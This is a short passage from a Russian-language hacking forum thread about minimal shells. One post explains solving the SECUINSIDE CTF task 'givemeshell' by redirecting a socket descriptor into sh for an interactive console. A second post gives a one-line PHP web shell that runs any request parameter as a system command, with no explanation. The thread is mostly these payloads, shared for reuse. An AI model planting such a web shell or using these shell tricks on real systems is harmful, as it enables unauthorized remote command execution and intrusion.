Старый 28.05.2013, 11:35   #11
Beched
 
Регистрация: 06.07.2010
Сообщений: 400
Репутация: 118
По умолчанию

На прошедшем SECUINSIDE CTF quals было задание givemeshell, где как раз надо было короткий шелл сделать.
Только не в вебе, а в демоне. Демон читал только 5 байт входа и выполнял их. Решалось так:
sh<&4 //из дескриптора сокета направляем ввод в шелл
sh>&4 //эту команду выполняет уже не демон, а sh, получаем интерактивную консоль.
Beched вне форума   Ответить с цитированием
Старый 25.08.2013, 18:14   #12
Thanatos
 
Аватар для Thanatos
 
Регистрация: 20.08.2013
Сообщений: 8
Репутация: -2
По умолчанию

Код:
<?=`$_REQUEST[1]`?>
Thanatos вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot